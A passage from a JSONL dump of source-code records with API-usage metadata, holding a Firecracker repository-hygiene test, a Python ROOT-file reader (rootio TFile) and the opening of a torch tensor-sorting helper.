"line_number": 98, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.utils.safe_mkdir_recursive", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 100, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 108, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 109, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "acados_template.AcadosOcp", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "acados_template.AcadosOcpSolver", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 172, "usage_type": "call"}, {"api_name": "casadi.MX.sym", "line_number": 188, "usage_type": "call"}, {"api_name": "casadi.MX", "line_number": 188, "usage_type": "attribute"}, {"api_name": "acados_template.AcadosModel", "line_number": 192, "usage_type": "call"}, {"api_name": "casadi.vertcat", "line_number": 226, "usage_type": "call"}, {"api_name": "casadi.Function", "line_number": 227, "usage_type": "call"}, {"api_name": "casadi.atan", "line_number": 230, "usage_type": "call"}, {"api_name": "casadi.tan", "line_number": 230, "usage_type": "call"}, {"api_name": "casadi.vertcat", "line_number": 231, "usage_type": "call"}, {"api_name": "casadi.cos", "line_number": 231, "usage_type": "call"}, {"api_name": "casadi.sin", "line_number": 231, "usage_type": "call"}, {"api_name": "casadi.atan", "line_number": 234, "usage_type": "call"}, {"api_name": "casadi.tan", "line_number": 234, "usage_type": "call"}, {"api_name": "casadi.sin", "line_number": 235, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 277, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 338, "usage_type": "call"}]} +{"seq_id": "22342901978", "text": "import subprocess\nfrom pathlib import Path\n\nimport yaml\n\n\ndef test_repo_no_spaces_in_paths():\n \"\"\"\n Ensure there are no spaces in paths.\n \"\"\"\n # pylint: disable-next=subprocess-run-check\n res = subprocess.run(\n \"git ls-files | grep '[[:space:]]'\",\n cwd=\"..\",\n capture_output=True,\n shell=True,\n )\n # If grep doesn't find any, it will exit with status 1. Otherwise 0\n assert res.returncode == 1, \"Some files have spaces:\\n\" + res.stdout.decode()\n\n\ndef test_repo_validate_yaml():\n \"\"\"\n Ensure all YAML files are valid\n \"\"\"\n\n repo_root = Path(\"..\")\n for path in repo_root.rglob(\"*.y*ml\"):\n yaml.safe_load(path.open(encoding=\"utf-8\"))\n", "repo_name": "firecracker-microvm/firecracker", "sub_path": "tests/integration_tests/style/test_repo.py", "file_name": "test_repo.py", "file_ext": "py", "file_size_in_byte": 705, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22949, "dataset": "github-code", "pt": "53", "api": [{"api_name": "subprocess.run", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 27, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "35720140165", "text": "import rootio.ROOT as ROOT\nfrom rootio import TBuffer\nfrom rootio import TDirectory\nfrom rootio.StreamerDict import Streamers\nfrom rootio.IOData import IOData\nimport os\nimport logging\nfrom . import UnZip\nimport box \nimport json\n\n\nclass TFile (object) :\n\tdef __init__(self, url) :\n\t\t\n\t\tself.logger = logging.getLogger( \"rootio.TFile\" )\n\t\t# self.logger.debug( \"Creating TFile[ url=%s ]\", url )\n\t\tself._typename = \"TFile\"\n\t\tself.fEND = 0\n\t\tself.fFullURL = url\n\t\tself.fURL = url\n\t\tself.fAcceptRanges = True\n\t\tself.fUseStampPar = \"stamp = \"\n\t\tself.fFileContent = None\n\t\tself.fMaxRanges = 200\n\t\tself.fDirectories = []\n\t\tself.fKeys = []\n\t\tself.fSeekInfo = 0\n\t\tself.fNbytesInfo = 0\n\t\tself.fTagOffset = 0\n\t\tself.fStreamerInfos = None\n\t\tself.fFileName = \"\"\n\t\tself.fStreamers = {}\n\t\tself.fBasicTypes = {}\n\n\t\t# TLocalFile parts\n\t\t\n\t\tself.fUseStampPar = False;\n\n\t\tif os.path.isfile( url ):\n\t\t\t# TODO open file\n\t\t\tfile = open( url, \"rb\")\n\t\t\tself.fLocalFile = file\n\t\t\tself.fEND = os.stat( url ).st_size\n\t\t\tself.fFullURL = file.name;\n\t\t\tself.fURL = file.name;\n\t\t\tself.fFileName = file.name;\n\t\telse :\n\t\t\traise Exception( \"File DNE\" )\n\n\t\tself.ReadKeys()\n\n\tdef to_json( self ) :\n\t\tobj = {\n\t\t\t\"_typename\": self._typename,\n\t\t\t\"fAcceptRanges\": self.fAcceptRanges,\n\t\t\t\"fBEGIN\": self.fBEGIN,\n\t\t\t\"fBasicTypes\": self.fBasicTypes,\n\t\t\t\"fCompress\": self.fCompress,\n\t\t\t\"fDatimeC\" : self.fDatimeC,\n\t\t\t\"fDatimeM\" : self.fDatimeM,\n\t\t\t\"fDirectories\" : self.fDirectories,\n\t\t\t\"fEND\" : self.fEND,\n\t\t\t\"fFileContent\" : self.fFileContent,\n\t\t\t\"fFileName\" : self.fFileName,\n\t\t\t\"fFullURL\" : self.fFullURL,\n\t\t\t\"fKeys\" : self.fKeys,\n\t\t\t\"fMaxRanges\" : self.fMaxRanges,\n\t\t\t\"fNbytesFree\" : self.fNbytesFree,\n\t\t\t\"fNbytesInfo\" : self.fNbytesInfo,\n\t\t\t\"fNbytesKeys\" : self.fNbytesKeys,\n\t\t\t\"fNbytesName\" : self.fNbytesName,\n\t\t\t\"fSeekDir\" : self.fSeekDir,\n\t\t\t\"fSeekFree\" : self.fSeekFree,\n\t\t\t\"fSeekInfo\" : self.fSeekInfo,\n\t\t\t\"fSeekKeys\" : self.fSeekKeys,\n\t\t\t\"fSeekParent\" : self.fSeekParent,\n\t\t\t\"fStreamerInfos\" : self.fStreamerInfos,\n\t\t\t\"fStreamers\" : self.fStreamers,\n\t\t\t\"fTagOffset\" : self.fTagOffset,\n\t\t\t\"fTitle\" : self.fTitle,\n\t\t\t\"fURL\" : self.fURL,\n\t\t\t\"fUnits\" : self.fUnits,\n\t\t\t\"fUseStampPar\" : self.fUseStampPar,\n\t\t\t\"fVersion\" : self.fVersion,\n\t\t\t# \"dict\" : self.__dict__.keys()\n\t\t}\n\t\treturn obj\n\n\n\tdef list_keys(self) :\n\t\tfor k in self.fKeys :\n\t\t\tfqn = k['fName']\n\t\t\tprint( \"[%s]: \" %( k['fClassName'] ) + fqn )\n\t\t\tif \"TDirectory\" == k['fClassName'] :\n\t\t\t\ttdir = self.ReadObject( fqn )\n\t\t\t\ttdir.list_keys( prefix=fqn )\n\n\n\tdef ReadBuffer( self, place ) :\n\t\t# self.logger.debug( \"ReadBuffer( %s )\", place )\n\t\tself.fLocalFile.seek( place[0] )\n\t\treturn self.fLocalFile.read( place[1] )\n\n\tdef GetDir(self, dirname, cycle ):\n\t\tif None == cycle and type(dirname) is str :\n\t\t\tpos = s.rfind( ';' )\n\t\t\tif pos > 0 :\n\t\t\t\tcycle = dirname[ pos+1: ]\n\t\t\t\tdirname = dirname[ 0:pos ]\n\t\t\n\t\tfor j in range( 0, len(self.fDirectories) ) :\n\t\t\ttdir = self.fDirectories[j]\n\t\t\tif tdir.dir_name != dirname :\n\t\t\t\tcontinue\n\t\t\treturn tdir\n\t\treturn None\n\n\tdef GetKey(self, keyname, cycle ) :\n\t\tfor i in range( 0, len(self.fKeys) ) :\n\t\t\tif 'fName' in self.fKeys[i] and self.fKeys[i]['fName'] == keyname and 'fCycle' in self.fKeys[i] and self.fKeys[i]['fCycle'] == cycle :\n\t\t\t\treturn self.fKeys[i]\n\t\t\n\t\t# look for directories\n\t\tpos = keyname.rfind( '/' )\n\n\t\twhile pos > 0 :\n\t\t\tdirname = keyname[0:pos]\n\t\t\tsubname = keyname[pos+1:]\n\t\t\t\n\t\t\ttdir = self.GetDir( dirname, 1 )\n\t\t\tif None != tdir :\n\t\t\t\treturn tdir.GetKey( subname, cycle )\n\t\t\t\n\t\t\tdirkey = self.GetKey( dirname, 1 )\n\t\t\t\n\t\t\tif None != dirkey and \"fClassName\" in dirkey and \"TDirectory\" in dirkey['fClassName'] :\n\t\t\t\ttdir = self.ReadObject( dirname )\n\t\t\t\tif None != tdir :\n\t\t\t\t\treturn tdir.GetKey( subname, cycle )\n\t\t\t\n\t\t\tpos = keyname.rfind( '/', 0, pos-1 )\n\t\t\n\t\treturn None\n\t\t#TODO : add second part of impl\n\n\tdef ReadObjBuffer(self, key ) :\n\t\t# self.logger.debug( \"ReadObjBuffer( %s )\", key )\n\t\tblob1 = self.ReadBuffer( [key['fSeekKey'] + key['fKeylen'], key['fNbytes'] - key['fKeylen']] )\n\t\tif None == blob1 :\n\t\t\treturn None\n\n\t\tbuf = None\n\t\tif key['fObjlen'] <= (key['fNbytes'] - key['fKeylen']) : \n\t\t\tbuf = TBuffer( blob1, 0, self, None )\n\t\telse :\n\t\t\t# self.logger.debug( \"UNZIPPING obj buffer\" )\n\t\t\tobjbuf = UnZip.R__unzip(blob1, key['fObjlen'])\n\t\t\tif None == objbuf :\n\t\t\t\treturn None\n\t\t\tbuf = TBuffer( objbuf, 0, self, None )\n\n\t\t\n\t\tbuf.fTagOffset = key['fKeylen']\n\t\treturn buf\n\n\tdef AddReadTree(self, obj ) :\n\t\t# self.logger.debug( \"AddReadTree( %s )\", obj )\n\t\tpass\n\n\tdef Get( self, obj_name, cycle=1 ) :\n\t\tobj = self.ReadObject( obj_name, cycle )\n\t\tif None == obj :\n\t\t\treturn None\n\n\t\ttry :\n\t\t\tfrom rootio.Histogram import Histogram\n\t\t\tif \"TH1\" in obj['_typename'] or \"TH2\" in obj['_typename'] or \"TH3\" in obj['_typename'] :\n\t\t\t\treturn Histogram( obj )\n\t\texcept KeyError as ke :\n\t\t\tself.logger.error( ke )\n\n\t\treturn None\n\n\n\n\tdef ReadObject(self, obj_name, cycle = 1) :\n\t\t# self.logger.debug( \"ReadObject( obj_name=%s, cycle=%d )\", obj_name, cycle )\n\n\t\t# if type( cycle ) === function :\n\t\tif callable( cycle ) :\n\t\t\tcycle = 1 \n\n\t\tpos = obj_name.rfind( ';' )\n\t\tif pos > 0 :\n\t\t\tcycle = int( obj_name[pos+1 : pos+2 ] )\n\t\t\tobj_name = obj_name[ 0 : pos ]\n\n\t\tif cycle < 0 :\n\t\t\tcycle = 1\n\n\t\twhile ( len(obj_name) > 0 and obj_name[0] == \"/\" ) :\n\t\t\tobj_name = obj_name[ 1: ]\n\n\t\tkey = self.GetKey( obj_name, cycle )\n\t\tif None == key :\n\t\t\treturn None\n\n\t\tif \"StreamerInfo\" == obj_name and \"TList\" == key['fClassName'] :\n\t\t\treturn self.fStreamerInfos\n\n\t\tisdir = False\n\t\tif \"TDirectory\" == key['fClassName'] or \"TDirectoryFile\" == key['fClassName'] :\n\t\t\tisdir = True\n\t\t\ttdir = self.GetDir( obj_name, cycle )\n\t\t\tif None != tdir :\n\t\t\t\treturn tdir\n\n\t\tbuf = self.ReadObjBuffer( key )\n\t\tif None == buf :\n\t\t\treturn None\n\n\t\tif isdir :\n\t\t\ttdir = TDirectory( self, obj_name, cycle )\n\t\t\ttdir.fTitle = key['fTitle']\n\t\t\ttdir.ReadKeys( buf )\n\t\t\treturn tdir\n\n\t\tobj = {}\n\t\tbuf.MapObject( 1, obj )\n\t\tbuf.ClassStreamer( obj, key['fClassName'] )\n\n\t\tif \"TF1\" == key['fClassName'] :\n\t\t\treturn self.ReadFormulas( obj, -1 )\n\n\t\t#TODO : add Tree support\n\n\t\treturn obj\n\n\tdef ReadFormulas(self, tf1, cnt ) :\n\t\t# self.logger.debug( \"ReadFormulas( ... )\" )\n\t\tpass\n\t\t# TODO :add\n\n\tdef ExtractStreamerInfos( self, buf ) :\n\t\t# self.logger.debug( \"ExtractStreamerInfos( buf=%s )\", buf )\n\t\tif None == buf :\n\t\t\treturn\n\n\t\tlst = {}\n\t\tbuf.MapObject( 1, lst )\n\t\tbuf.ClassStreamer( lst, 'TList' )\n\t\t\n\t\tlst['_typename'] = \"TStreamerInfoList\"\n\n\t\tself.fStreamerInfos = lst\n\t\t# self.logger.debug( \"fStreamerInfos = \\n %s\", json.dumps(lst, indent=4) )\n\n\t\t# TODO : add to ROOT\n\t\t# ROOT.addStreamerInfos( lst )\n\n\t\tfor k in range( 0, len(lst['arr']) ) :\n\t\t\t# self.logger.info( \"LOOP %d\", k )\n\t\t\t# self.logger.info( json.dumps( self, indent=4, sort_keys=True ) )\n\t\t\tsi = lst['arr'][k]\n\t\t\t\n\t\t\tif 'fElements' not in si or None == si['fElements'] :\n\t\t\t\tcontinue\n\n\t\t\tfor l in range( 0, len(si['fElements']['arr']) ) :\n\t\t\t\telem = si['fElements']['arr'][l]\n\n\t\t\t\tif 'fTypeName' not in elem or None == elem['fTypeName'] or 'fType' not in elem or None == elem['fType'] :\n\t\t\t\t\tcontinue\n\n\t\t\t\ttyp = elem['fType'] \n\t\t\t\ttypename = elem['fTypeName']\n\n\t\t\t\tif typ >= 60 :\n\t\t\t\t\tif IOData.kStreamer == typ and \"TStreamerSTL\" == elem['_typename'] and None != elem['fSTLtype'] and None != elem['fCtype'] and elem['fCtype'] < 20 :\n\t\t\t\t\t\tprefix = IOData.StlNames[ elem['fSTLtype'] ] if None != IOData.StlNames and None != IOData.StlNames[ elem['fSTLtype'] ] else \"undef\" + \"<\"\n\t\t\t\t\t\tif 0 == typename.find( prefix ) and \">\" == typename[ -1 ] :\n\t\t\t\t\t\t\ttyp = elem['fCtype']\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#TODO trim string\n\t\t\t\t\t\t\ttypename = typename[ len(prefix) : len(typename) - len(prefix) - 1 ].strip()\n\t\t\t\t\t\t\tif IOData.kSTLmap == elem['fSTLtype'] or IOData.kSTLmultimap == elem['fSTLtype'] :\n\t\t\t\t\t\t\t\tif typename.find(',')>0 :\n\t\t\t\t\t\t\t\t\ttypename = typename[ 0: typename.find( ',' ) ].strip()\n\t\t\t\t\t\t\t\telse :\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\tif typ > 60 :\n\t\t\t\t\t\tcontinue\n\t\t\t\telse :\n\t\t\t\t\tif typ > 20 and \"*\" == typename[ -1 ] :\n\t\t\t\t\t\ttypename = typename[ 0 : -1 ]\n\t\t\t\t\ttyp = typ % 20\n\n\t\t\t\tkind = ROOT.ROOT.GetTypeId( typename )\n\t\t\t\tif kind == typ :\n\t\t\t\t\tcontinue\n\n\t\t\t\tif IOData.kBits == typ and IOData.kUInt == kind :\n\t\t\t\t\tcontinue\n\t\t\t\tif IOData.kCounter and IOData.kInt == kind :\n\t\t\t\t\tcontinue\n\n\t\t\t\tif None != typename and None != typ :\n\t\t\t\t\t# self.logger.debug( \"Extract basic data type %s %s\", typ, typename )\n\t\t\t\t\tself.fBasicTypes[ typename ] = typ\n\t\t# self.logger.info( \"after extracting streamer info:\" )\n\t\t# self.logger.info( json.dumps( self, indent=4, sort_keys=True ) )\n\n\tdef __getitem__(self, key):\n\t\treturn getattr(self, key)\n\tdef __setitem__(self, key, value) :\n\t\tobject.__setattr__( self, key, value )\n\n\tdef ReadKeys( self ) :\n\t\tblob = self.ReadBuffer( [0, 1024] )\n\t\tif None == blob :\n\t\t\treturn None\n\n\t\tbuf = TBuffer( blob, 0, self, None )\n\t\tftype = buf.substring( 0, 4 )\n\t\t# self.logger.debug( \"fType=%s\", ftype )\n\t\tif ftype != 'root' :\n\t\t\t# self.logger.debug(\"NOT A ROOT FILE\")\n\t\t\treturn\n\n\t\tbuf.shift( 4 )\n\n\t\tself.fVersion = buf.ntou4()\n\t\tself.fBEGIN = buf.ntou4()\n\t\tif self.fVersion < 1000000 : # small size\n\t\t\tself.fEND = buf.ntou4()\n\t\t\tself.fSeekFree = buf.ntou4()\n\t\t\tself.fNbytesFree = buf.ntou4()\n\t\t\tnfree = buf.ntoi4()\n\t\t\tself.fNbytesName = buf.ntou4()\n\t\t\tself.fUnits = buf.ntou1()\n\t\t\tself.fCompress = buf.ntou4()\n\t\t\tself.fSeekInfo = buf.ntou4()\n\t\t\tself.fNbytesInfo = buf.ntou4()\n\t\telse :\n\t\t\tself.fEND = buf.ntou8()\n\t\t\tself.fSeekFree = buf.ntou8()\n\t\t\tself.fNbytesFree = buf.ntou8()\n\t\t\tnfree = buf.ntou4()\n\t\t\tself.fNbytesName = buf.ntou4()\n\t\t\tself.fUnits = buf.ntou1()\n\t\t\tself.fCompress = buf.ntou4()\n\t\t\tself.fSeekInfo = buf.ntou8()\n\t\t\tself.fNbytesInfo = buf.ntou4()\n\n\t\t# self.logger.debug(\"File Header:\")\n\t\t# self.logger.debug( \"self.fVersion = %d\", self.fVersion)\n\t\t# self.logger.debug( \"self.fBEGIN = %d\", self.fBEGIN)\n\t\t# self.logger.debug( \"self.fEND = %d\", self.fEND )\n\t\t# self.logger.debug( \"self.fSeekFree = %d\", self.fSeekFree )\n\t\t# self.logger.debug( \"self.fNbytesFree = %d\", self.fNbytesFree )\n\t\t# self.logger.debug( \"self.fNbytesName = %d\", self.fNbytesName )\n\t\t# self.logger.debug( \"self.fUnits = %d\", self.fUnits )\n\t\t# self.logger.debug( \"self.fCompress = %d\", self.fCompress )\n\t\t# self.logger.debug( \"self.fSeekInfo = %d\", self.fSeekInfo )\n\t\t# self.logger.debug( \"self.fNbytesInfo = %d\", self.fNbytesInfo )\n\t\t# self.logger.debug( \"\" )\n\n\t\tif None == self.fSeekInfo or None == self.fNbytesInfo :\n\t\t\treturn None\n\t\tif 0 == self.fNbytesName or self.fNbytesName > 100000 :\n\t\t\t# self.logger.debug( \"Init : cannot read directory info for file :\", self.fURL )\n\t\t\treturn None\n\n\t\tnbytes = self.fNbytesName + 22;\n\t\tnbytes += 4; # fDatimeC.Sizeof();\n\t\tnbytes += 4; # fDatimeM.Sizeof();\n\t\tnbytes += 18; # fUUID.Sizeof();\n\t\tif self.fVersion >= 40000 :\n\t\t\tnbytes += 12;\n\n\t\tblob3 = self.ReadBuffer( [self.fBEGIN, max( 300, nbytes )] )\n\t\tbuf3 = TBuffer( blob3, 0, self, None )\n\n\t\tself.fTitle = buf3.ReadTKey()['fTitle']\n\t\t# self.logger.debug( \"self.fTitle = %s\", self.fTitle )\n\t\tbuf3.locate( self.fNbytesName )\n\t\tbuf3.ClassStreamer( self, 'TDirectory' )\n\n\t\t# self.logger.info( \"file now:\" )\n\t\t# self.logger.info( json.dumps(self, indent=4, sort_keys=True) )\n\n\t\tif False == hasattr( self, 'fSeekKeys' ) or 0 == self.fSeekKeys :\n\t\t\t# self.logger.debug( \"Empty key list in\", self.fURL )\n\t\t\treturn None\n\n\t\tblob4 = self.ReadBuffer( [self.fSeekKeys, self.fNbytesKeys] )\n\t\tbuf4 = TBuffer( blob4, 0, self, None )\n\n\t\tbuf4.ReadTKey()\n\t\tnkeys = buf4.ntoi4()\n\t\tfor i in range( 0, nkeys ) :\n\t\t\tk = buf4.ReadTKey()\n\t\t\t# self.logger.debug( \"Adding Key : %s %s, %s \", k['fClassName'], k['fName'], k['fTitle'] )\n\t\t\tself.fKeys.append( k )\n\n\t\tblob5 = self.ReadBuffer( [self.fSeekInfo, self.fNbytesInfo] )\n\t\tbuf5 = TBuffer( blob5, 0, self, None )\n\t\tsi_key = buf5.ReadTKey()\n\t\tif None == si_key :\n\t\t\t# self.logger.debug( \"No info?\" )\n\t\t\treturn None\n\n\t\tself.fKeys.append( si_key )\n\t\t# self.logger.debug( \"StreamerInfo:\", si_key )\n\t\tbuf6 = self.ReadObjBuffer( si_key )\n\t\tif None != buf6 :\n\t\t\tself.ExtractStreamerInfos( buf6 )\n\n\tdef GetStreamer(self, classname, ver, s_i = None ):\n\t\tself.logger.debug( \"GetStreamer(classname=%s, ver=%s, s_i=%s )\", classname, ver, s_i )\n\t\tif 'TQObject' == classname or 'TBasket' == classname :\n\t\t\treturn None\n\n\t\tfullname = classname\n\t\tstreamer = None \n\n\t\tif \"TH1\" == classname :\n\t\t\tself.logger.debug(\"TH1\")\n\n\t\tif None != ver and ( 'checksum' in ver or 'val' in ver ) :\n\t\t\tfullname += \"$chksum\" + str(ver['checksum']) if 'checksum' in ver else \"$ver\" + str(ver['val'])\n\t\t\tself.logger.debug( \"Looking for streamer : %s\",fullname )\n\t\t\tstreamer = self.fStreamers[ fullname ] if fullname in self.fStreamers else None\n\t\t\tif None != streamer :\n\t\t\t\tself.logger.debug( \"Found Streamer, just trust me\" )\n\n\t\t\t\treturn streamer\n\n\t\tself.logger.debug( \"Looking for custom streamer named %s\", classname)\n\n\t\tCustomStreamers = Streamers.CustomStreamers\n\t\tcustom = CustomStreamers[ classname ] if classname in CustomStreamers else None\n\n\t\tif None != custom :\n\t\t\tself.logger.debug(\"Found custom streamer for %s\", classname )\n\t\t\t\n\t\tif type( custom ) == str :\n\t\t\treturn self.GetStreamer( custom, ver, s_i )\n\n\t\tif True == callable( custom ) :\n\t\t\tstreamer = [ { 'typename' : classname, 'func': custom } ]\n\t\t\treturn ROOT.ROOT.AddClassMethods( classname, streamer )\n\n\t\tstreamer = []\n\t\tif box.BoxList == type( custom ) :\n\t\t\tif 'name' not in custom and 'func' not in custom :\n\t\t\t\treturn custom\n\t\t\tstreamer.append( custom )\n\t\t\n\t\t# check element in streamer infos, one can have special cases\n\t\tif None == s_i : \n\t\t\ts_i = self.FindStreamerInfo(classname, ver['val'], ver['checksum'] if 'checksum' in ver else None);\n\n\t\tif None == s_i :\n\t\t\t# delete this.fStreamers[fullname];\n\t\t\tif fullname in self.fStreamers :\n\t\t\t\tself.logger.debug( \"s_i is None but % in Streamers\", fullname )\n\n\t\t\tif 'nowarning' not in ver or ver['nowarning'] == None :\n\t\t\t\tself.logger.debug(\"Not found streamer for %s, ver=%s, checksum=%s, fullname=%s\", classname, ver['val'], ver['checksum'] if 'checksum' in ver else None, fullname)\n\t\t\treturn None\n\n\t\t# for each entry in streamer info produce member function\n\n\t\ttry :\n\t\t\tself.logger.debug( \"s_i = %s\", s_i )\n\t\t\tfor obj in s_i['fElements']['arr'] :\n\t\t\t\t# obj = s_i['fElements']['arr'][s]\n\t\t\t\tstreamer.append( ROOT.ROOT.CreateMember( obj, self ) )\n\t\t\t\tself.logger.debug( \"Appending streamer for obj=%s\", obj )\n\t\texcept KeyError :\n\t\t\tself.logger.debug( \"No fElements.arr\" )\n\t\tself.logger.debug( \"fStreamers[%s] = %s\", fullname, streamer )\n\t\t\n\t\tself.logger.debug( \"fStreamers[%s] = SET\", fullname )\n\t\tself.fStreamers[fullname] = streamer;\n\n\t\treturn ROOT.ROOT.AddClassMethods(classname, streamer);\n\n\tdef FindStreamerInfo( self, clname, clversion, clchecksum = None ) :\n\t\tif None == self.fStreamerInfos :\n\t\t\treturn None\n\n\t\tfor si in self.fStreamerInfos['arr'] :\n\t\t\tif clchecksum != None and si['fCheckSum'] == clchecksum :\n\t\t\t\treturn si\n\t\t\tif si['fName'] != clname :\n\t\t\t\tcontinue\n\t\t\t# this means that if it as not found by checksum it should have been None\n\t\t\t# if checksum was given it should match\n\t\t\tif clchecksum != None :\n\t\t\t\tcontinue\n\n\t\t\tif clversion != None and si['fClassVersion'] != clversion :\n\t\t\t\tcontinue\n\n\t\t\treturn si\n\n\t\treturn None", "repo_name": "jdbrice/root-io", "sub_path": "rootio/TFile.py", "file_name": "TFile.py", "file_ext": "py", "file_size_in_byte": 15142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 44, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 155, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 161, "usage_type": "call"}, {"api_name": "rootio.Histogram.Histogram", "line_number": 179, "usage_type": "call"}, {"api_name": "rootio.TDirectory", "line_number": 224, "usage_type": "call"}, {"api_name": "rootio.IOData.IOData.kStreamer", "line_number": 280, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 280, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.StlNames", "line_number": 281, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 281, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kSTLmap", "line_number": 287, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 287, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kSTLmultimap", "line_number": 287, "usage_type": "attribute"}, {"api_name": "rootio.ROOT.ROOT.GetTypeId", "line_number": 299, "usage_type": "call"}, {"api_name": "rootio.ROOT.ROOT", "line_number": 299, "usage_type": "attribute"}, {"api_name": "rootio.ROOT", "line_number": 299, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kBits", "line_number": 303, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 303, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kUInt", "line_number": 303, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData.kCounter", "line_number": 305, "usage_type": "attribute"}, {"api_name": "rootio.IOData.IOData", "line_number": 305, "usage_type": "name"}, {"api_name": "rootio.IOData.IOData.kInt", "line_number": 305, "usage_type": "attribute"}, {"api_name": "rootio.TBuffer", "line_number": 324, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 383, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 398, "usage_type": "call"}, {"api_name": "rootio.TBuffer", "line_number": 408, "usage_type": "call"}, {"api_name": "rootio.StreamerDict.Streamers.CustomStreamers", "line_number": 442, "usage_type": "attribute"}, {"api_name": "rootio.StreamerDict.Streamers", "line_number": 442, "usage_type": "name"}, {"api_name": "rootio.ROOT.ROOT.AddClassMethods", "line_number": 453, "usage_type": "call"}, {"api_name": "rootio.ROOT.ROOT", "line_number": 453, "usage_type": "attribute"}, {"api_name": "rootio.ROOT", "line_number": 453, "usage_type": "name"}, {"api_name": "box.BoxList", "line_number": 456, "usage_type": "attribute"}, {"api_name": "rootio.ROOT.ROOT.CreateMember", "line_number": 480, "usage_type": "call"}, {"api_name": "rootio.ROOT.ROOT", "line_number": 480, "usage_type": "attribute"}, {"api_name": "rootio.ROOT", "line_number": 480, "usage_type": "name"}, {"api_name": "rootio.ROOT.ROOT.AddClassMethods", "line_number": 489, "usage_type": "call"}, {"api_name": "rootio.ROOT.ROOT", "line_number": 489, "usage_type": "attribute"}, {"api_name": "rootio.ROOT", "line_number": 489, "usage_type": "name"}]} +{"seq_id": "23740386569", "text": "import numpy as np\nimport torch\n\ndef sort_tensor(inp_tensor, sort_column_id):\n \"\"\"\n Sort a tensor according the contents of a column\n Params ::\n inp_tensor: 